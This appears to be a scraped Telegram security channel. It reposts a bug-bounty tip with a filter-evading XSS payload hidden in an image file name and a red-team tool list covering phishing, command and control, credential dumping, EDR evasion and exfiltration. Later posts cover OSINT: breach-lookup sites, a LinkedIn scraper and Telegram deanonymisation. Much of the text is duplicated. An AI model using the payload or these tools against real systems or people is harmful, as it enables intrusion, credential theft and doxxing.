XSS where you can inject the payload within the image file name and alert!.
๐๐๐ฃ๐ :
https://twitter.com/thecybertix/status/1658343842943496192?t=oDKM3yzg1SgmXFxPjIoLGA&s=19
๐๐๐ฃ๐ :
https://twitter.com/thecybertix/status/1658343842943496192?t=oDKM3yzg1SgmXFxPjIoLGA&s=19
X (formerly Twitter)
Cybertix on X
XSS where you can inject the payload within the image file name and alert!.
Payload: 12345-abc-1-23456<scr<script>ipt>alert(document.cookie)<%2Fscr<script>ipt>.img
Subscribe to our YouTube Channel:
https://t.co/c6zTMaPxRT
#bugbountytips #XSS #Securityโฆ
Payload: 12345-abc-1-23456<scr<script>ipt>alert(document.cookie)<%2Fscr<script>ipt>.img
Subscribe to our YouTube Channel:
https://t.co/c6zTMaPxRT
#bugbountytips #XSS #Securityโฆ
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
๐๐๐ ๐๐๐๐ฆ ๐๐จ๐จ๐ฅ๐ฌ ๐ฅ
๐ด RECONNAISSANCE:
- RustScan ==> https://lnkd.in/ebvRfBNy
- NmapAutomator ==> https://lnkd.in/gu5wxzf6
- AutoRecon ==> https://lnkd.in/g3DeG6YT
- Amass ==> https://lnkd.in/e7V569N5
- CloudEnum ==> https://lnkd.in/ePHDeGZv
- Recon-NG ==> https://lnkd.in/edwaXFjS
- AttackSurfaceMapper ==> https://lnkd.in/ebbcj6Rm
- DNSDumpster ==> https://dnsdumpster.com/
๐ด INITIAL ACCESS:
- SprayingToolKit ==> https://lnkd.in/eBSAPz5z
- o365Recon ==> https://lnkd.in/eJwCx-Ga
- Psudohash ==> https://lnkd.in/gcaxV6fR
- CredMaster ==> https://lnkd.in/gtMEDVuS
- DomainPasswordSpray ==> https://lnkd.in/guWj4TYv
- TheSprayer ==> https://lnkd.in/gZVuQYiv
- TREVORspray ==> https://lnkd.in/gHgcbjgV
๐ด DELIVERY:
- o365AttackToolKit ==> https://lnkd.in/etCCYi8y
- EvilGinx2 ==> https://lnkd.in/eRDPvwUg
- GoPhish ==> https://lnkd.in/ea26dfNg
- PwnAuth ==> https://lnkd.in/eqecM7de
- Modlishka ==> https://lnkd.in/eds-dR5C
๐ด COMMAND AND CONTROL:
- PoshC2 ==> https://lnkd.in/eqSJUDji
- Sliver ==> https://lnkd.in/ewN9Nday
- SILENTTRINITY ==> https://lnkd.in/eeZGbYMs
- Empire ==> https://lnkd.in/egAPa8gY
- AzureC2Relay ==> https://lnkd.in/efmh2t3g
- Havoc C2 ==> https://lnkd.in/gEFp2iym
- Mythic C2 ==> https://lnkd.in/gnCGwfWk
๐ด CREDENTIAL DUMPING:
- MimiKatz ==> https://lnkd.in/etEGfvJK
- HekaTomb ==> https://lnkd.in/eJx5Ugu5
- SharpLAPS ==> https://lnkd.in/eA28n9FT
- Net-GPPPassword ==> https://lnkd.in/e3CTez5A
- PyPyKatz ==> https://lnkd.in/eeb5b6Tz
๐ด PRIVILEGE ESCALATION:
- SharpUp ==> https://lnkd.in/etR2Pe_n
- MultiPotato ==> https://lnkd.in/eq53PXcJ
- PEASS ==> https://lnkd.in/eWA66akh
- Watson ==> https://lnkd.in/eZfYMSMX
- Bat-Potato ==> https://lnkd.in/gjziyG8q
๐ด DEFENSE EVASION:
- Villain ==> https://lnkd.in/gquyGFm5
- EDRSandBlast ==> https://lnkd.in/e8g8zYFT
- SPAWN - Cobalt Strike BOF ==> https://lnkd.in/e223PbqZ
- NetLoader ==> https://lnkd.in/ef5wCD4y
- KillDefenderBOF ==> https://lnkd.in/eVd54HUp
- ThreatCheck ==> https://lnkd.in/eHvSPakR
- Freeze ==> https://lnkd.in/eNUh3zCi
- GadgetToJScript ==> https://lnkd.in/egPQBBXJ
๐ด PERSISTENCE:
- SharPyShell ==> https://lnkd.in/eXm8h8Bj
- SharpStay ==> https://lnkd.in/erRbeFMj
- SharpEventPersist ==> https://lnkd.in/e_kJFNiB
๐ด LATERAL MOVEMENT:
- SCShell ==> https://lnkd.in/e256fC8B
- MoveKit ==> https://lnkd.in/eR-NUu_U
- ImPacket ==> https://lnkd.in/euG4hTTs
๐ด EXFILTRATION:
- SharpExfiltrate ==> https://lnkd.in/eGC4BKRN
- DNSExfiltrator ==> https://lnkd.in/epJ-s6gp
- Egress-Assess ==> https://lnkd.in/eXGFPQRJ
#redteam #cybersecurity #penetrationtesting #security #ethicalhacking #tools
๐ด RECONNAISSANCE:
- RustScan ==> https://lnkd.in/ebvRfBNy
- NmapAutomator ==> https://lnkd.in/gu5wxzf6
- AutoRecon ==> https://lnkd.in/g3DeG6YT
- Amass ==> https://lnkd.in/e7V569N5
- CloudEnum ==> https://lnkd.in/ePHDeGZv
- Recon-NG ==> https://lnkd.in/edwaXFjS
- AttackSurfaceMapper ==> https://lnkd.in/ebbcj6Rm
- DNSDumpster ==> https://dnsdumpster.com/
๐ด INITIAL ACCESS:
- SprayingToolKit ==> https://lnkd.in/eBSAPz5z
- o365Recon ==> https://lnkd.in/eJwCx-Ga
- Psudohash ==> https://lnkd.in/gcaxV6fR
- CredMaster ==> https://lnkd.in/gtMEDVuS
- DomainPasswordSpray ==> https://lnkd.in/guWj4TYv
- TheSprayer ==> https://lnkd.in/gZVuQYiv
- TREVORspray ==> https://lnkd.in/gHgcbjgV
๐ด DELIVERY:
- o365AttackToolKit ==> https://lnkd.in/etCCYi8y
- EvilGinx2 ==> https://lnkd.in/eRDPvwUg
- GoPhish ==> https://lnkd.in/ea26dfNg
- PwnAuth ==> https://lnkd.in/eqecM7de
- Modlishka ==> https://lnkd.in/eds-dR5C
๐ด COMMAND AND CONTROL:
- PoshC2 ==> https://lnkd.in/eqSJUDji
- Sliver ==> https://lnkd.in/ewN9Nday
- SILENTTRINITY ==> https://lnkd.in/eeZGbYMs
- Empire ==> https://lnkd.in/egAPa8gY
- AzureC2Relay ==> https://lnkd.in/efmh2t3g
- Havoc C2 ==> https://lnkd.in/gEFp2iym
- Mythic C2 ==> https://lnkd.in/gnCGwfWk
๐ด CREDENTIAL DUMPING:
- MimiKatz ==> https://lnkd.in/etEGfvJK
- HekaTomb ==> https://lnkd.in/eJx5Ugu5
- SharpLAPS ==> https://lnkd.in/eA28n9FT
- Net-GPPPassword ==> https://lnkd.in/e3CTez5A
- PyPyKatz ==> https://lnkd.in/eeb5b6Tz
๐ด PRIVILEGE ESCALATION:
- SharpUp ==> https://lnkd.in/etR2Pe_n
- MultiPotato ==> https://lnkd.in/eq53PXcJ
- PEASS ==> https://lnkd.in/eWA66akh
- Watson ==> https://lnkd.in/eZfYMSMX
- Bat-Potato ==> https://lnkd.in/gjziyG8q
๐ด DEFENSE EVASION:
- Villain ==> https://lnkd.in/gquyGFm5
- EDRSandBlast ==> https://lnkd.in/e8g8zYFT
- SPAWN - Cobalt Strike BOF ==> https://lnkd.in/e223PbqZ
- NetLoader ==> https://lnkd.in/ef5wCD4y
- KillDefenderBOF ==> https://lnkd.in/eVd54HUp
- ThreatCheck ==> https://lnkd.in/eHvSPakR
- Freeze ==> https://lnkd.in/eNUh3zCi
- GadgetToJScript ==> https://lnkd.in/egPQBBXJ
๐ด PERSISTENCE:
- SharPyShell ==> https://lnkd.in/eXm8h8Bj
- SharpStay ==> https://lnkd.in/erRbeFMj
- SharpEventPersist ==> https://lnkd.in/e_kJFNiB
๐ด LATERAL MOVEMENT:
- SCShell ==> https://lnkd.in/e256fC8B
- MoveKit ==> https://lnkd.in/eR-NUu_U
- ImPacket ==> https://lnkd.in/euG4hTTs
๐ด EXFILTRATION:
- SharpExfiltrate ==> https://lnkd.in/eGC4BKRN
- DNSExfiltrator ==> https://lnkd.in/epJ-s6gp
- Egress-Assess ==> https://lnkd.in/eXGFPQRJ
#redteam #cybersecurity #penetrationtesting #security #ethicalhacking #tools
lnkd.in
LinkedIn
This link will take you to a page thatโs not on LinkedIn
Forwarded from OSINT AMBITION (Dheeraj Yadav)
Is using same password everywhere safe | Password Security
New YouTube video uploaded now. Soon, more amazing coming soon especially for OSINT lovers once we reaches 200subs.
youtu.be/q97UuYWhSv8
#osint #privacy #security #infosec #cybersec #opsec #cybersecurity
New YouTube video uploaded now. Soon, more amazing coming soon especially for OSINT lovers once we reaches 200subs.
youtu.be/q97UuYWhSv8
#osint #privacy #security #infosec #cybersec #opsec #cybersecurity
YouTube
Is using same password everywhere safe | Password Security
Hello everyone, Welcome to our YouTube channel, OSINT Ambition where we upload content related to Privacy, Security and OSINT.
In this video, we have learnt about the following topics -
1. Is Using Same Password Everywhere Safe?
2. The Risks of Using theโฆ
In this video, we have learnt about the following topics -
1. Is Using Same Password Everywhere Safe?
2. The Risks of Using theโฆ
OSINT OPS Episode 1 | The Secret Behind Ransomwares
A new podcast styled video, give your feedback if you would like to see videos in this style by liking and commenting on the video.
We have some really good topics about ransomware which we think everyone should know.
https://youtu.be/1aHautvb1Wk?si
#cybersec #infosec #ransomware #privacy #security
A new podcast styled video, give your feedback if you would like to see videos in this style by liking and commenting on the video.
We have some really good topics about ransomware which we think everyone should know.
https://youtu.be/1aHautvb1Wk?si
#cybersec #infosec #ransomware #privacy #security
YouTube
OSINT OPS Episode 1 | The Secret Behind Ransomwares
Hello everyone, Welcome to our YouTube channel, OSINT Ambition, where we upload content related to Privacy, Security, and OSINT. ๐๐ต๏ธโโ๏ธ
In this inaugural episode of OSINT OPS, we unravel "The Secret Behind Ransomwares" in our engaging podcast series. Ourโฆ
In this inaugural episode of OSINT OPS, we unravel "The Secret Behind Ransomwares" in our engaging podcast series. Ourโฆ
Forwarded from OSINT AMBITION (Dheeraj Yadav)
Check if your email has been breached -
#osint #opsec #privacy #security #infosec #cybersec
https://haveibeenpwned.com/
https://www.breachdirectory.org/
https://leak-lookup.com/ (unverified)
https://snusbase.com/ (unverified)
https://dehashed.com/
https://intelx.io/
https://leakpeek.com/
https://search.0t.rocks/
https://monitor.firefox.com/
Join @osintambition for more.
#osint #opsec #privacy #security #infosec #cybersec
https://haveibeenpwned.com/
https://www.breachdirectory.org/
https://leak-lookup.com/ (unverified)
https://snusbase.com/ (unverified)
https://dehashed.com/
https://intelx.io/
https://leakpeek.com/
https://search.0t.rocks/
https://monitor.firefox.com/
Join @osintambition for more.
Haveibeenpwned
Have I Been Pwned: Check if your email has been compromised in a data breach
Have I Been Pwned allows you to search across multiple data breaches to see if your email address or phone number has been compromised.
Forwarded from OSINT AMBITION (Dheeraj Yadav)
The only OSINT tool you will ever need (ALL in one OSINT Tool)
https://youtu.be/Aj0sWUvGbEY
Join @osintambition for more.
#osint #privacy #security #infosec #cybersec #opsec
https://youtu.be/Aj0sWUvGbEY
Join @osintambition for more.
#osint #privacy #security #infosec #cybersec #opsec
YouTube
The only OSINT tool you will ever need (ALL in one OSINT Tool)
Hello everyone, Welcome to our YouTube channel, OSINT Ambition where we upload content related to Privacy, Security and OSINT.
In this video, we have talked about Vortimo osint tool, which makes your osint investigations easy and convienient.
Tool Usedโฆ
In this video, we have talked about Vortimo osint tool, which makes your osint investigations easy and convienient.
Tool Usedโฆ
Forwarded from OSINT AMBITION (Dheeraj Yadav)
Linux Distribution for #OSINT
Credit: @cybdetective
1. OSINTUX
https://www.osintux.org/
2. BackBox
https://www.backbox.org/
3. OSINTBox
https://github.com/Dimaslg/osintBOX
4. CSI Linux
https://csilinux.com/
5. ArchStrike
https://archstrike.org/
6. Offen Osint
https://github.com/Double2Sky/OffenOsint
7. Huron Osint
https://github.com/HuronOsint/OsintDistro
8. Septor Linux
https://septor.sourceforge.io/
9. Pentoo Linux
https://www.pentoo.ch/
10. Tsurugi Linux
https://tsurugi-linux.org/downloads.php
11. TraceLabs OSINT VM. : https://www.tracelabs.org/initiatives/osint-vm
Join @osintambition for more.
#osint #cybersec #infosec #security
Credit: @cybdetective
1. OSINTUX
https://www.osintux.org/
2. BackBox
https://www.backbox.org/
3. OSINTBox
https://github.com/Dimaslg/osintBOX
4. CSI Linux
https://csilinux.com/
5. ArchStrike
https://archstrike.org/
6. Offen Osint
https://github.com/Double2Sky/OffenOsint
7. Huron Osint
https://github.com/HuronOsint/OsintDistro
8. Septor Linux
https://septor.sourceforge.io/
9. Pentoo Linux
https://www.pentoo.ch/
10. Tsurugi Linux
https://tsurugi-linux.org/downloads.php
11. TraceLabs OSINT VM. : https://www.tracelabs.org/initiatives/osint-vm
Join @osintambition for more.
#osint #cybersec #infosec #security
Forwarded from OSINT AMBITION (Dheeraj Yadav)
ScrapedIn -
A tool to scrape LinkedIn without API restrictions for data reconnaissance
https://github.com/dchrastil/ScrapedIn
Detailed video with demo is coming soon on YouTube.
Join @osintambition for more.
#osint #osinf #cyber #infosec #linkedin #privacy #security
A tool to scrape LinkedIn without API restrictions for data reconnaissance
https://github.com/dchrastil/ScrapedIn
Detailed video with demo is coming soon on YouTube.
Join @osintambition for more.
#osint #osinf #cyber #infosec #linkedin #privacy #security
GitHub
GitHub - dchrastil/ScrapedIn: A tool to scrape LinkedIn without API restrictions for data reconnaissance
A tool to scrape LinkedIn without API restrictions for data reconnaissance - dchrastil/ScrapedIn
Forwarded from OSINT AMBITION (Dheeraj Yadav)
This new Email OSINT tools is amazing | OSINT Industries Alternative
https://youtu.be/qDRyDmWjDeU
Show some love on this video.
Like, share and subscribe.
Join @osintambition for more.
#osint #opsec #emailosint #phonenumberosint #privacy #security #socmint
https://youtu.be/qDRyDmWjDeU
Show some love on this video.
Like, share and subscribe.
Join @osintambition for more.
#osint #opsec #emailosint #phonenumberosint #privacy #security #socmint
YouTube
This new Email OSINT tools is amazing | OSINT Industries Alternative
Hello everyone, Welcome to our YouTube channel, OSINT Ambition where we upload content related to Privacy, Security and OSINT.
In this video, we have talked about Vortimo osint tool, which makes your osint investigations easy and convienient.
Apologiesโฆ
In this video, we have talked about Vortimo osint tool, which makes your osint investigations easy and convienient.
Apologiesโฆ
Forwarded from OSINT AMBITION (Dheeraj Yadav)
Top 7 Websites to check if your data has been leaked online | Breach Data | Email OSINT
https://youtu.be/Ef6J0haava8
#osint #privacy #security #infosec #cybersec #opsec
#email #emailosint
Like, share and subscribe.
Join @osintambition for more.
https://youtu.be/Ef6J0haava8
#osint #privacy #security #infosec #cybersec #opsec
#email #emailosint
Like, share and subscribe.
Join @osintambition for more.
YouTube
Top 7 Websites to check if your data has been leaked online | Breach Data | Email OSINT
Hello everyone, Welcome to our YouTube channel, OSINT Ambition where we upload content related to Privacy, Security and OSINT.
In this video, we have talked about top 7 websites to check if your data has been leaked online.
Used Websites -
https://havโฆ
In this video, we have talked about top 7 websites to check if your data has been leaked online.
Used Websites -
https://havโฆ
Forwarded from OSINT AMBITION (Dheeraj Yadav)
New blog in OSINT Ambition
OSINT: Revealing the digital identity of an invitation link creator on telegram by @ManuelBot59
https://publication.osintambition.org/osint-revealing-the-digital-identity-of-an-invitation-link-creator-on-telegram-de88b747c046
Join @osintambition for more.
#osint #socmint #telegramosint #infosec #cybersec #privacy #security #opsec
OSINT: Revealing the digital identity of an invitation link creator on telegram by @ManuelBot59
https://publication.osintambition.org/osint-revealing-the-digital-identity-of-an-invitation-link-creator-on-telegram-de88b747c046
Join @osintambition for more.
#osint #socmint #telegramosint #infosec #cybersec #privacy #security #opsec
Medium
๐ฅ๐ฅOSINT: Revealing the digital identity of an invitation link creator on telegram.
The screenshot shows a search performed on the Google search engine using Google Hacking techniques, with the goal of finding Telegramโฆ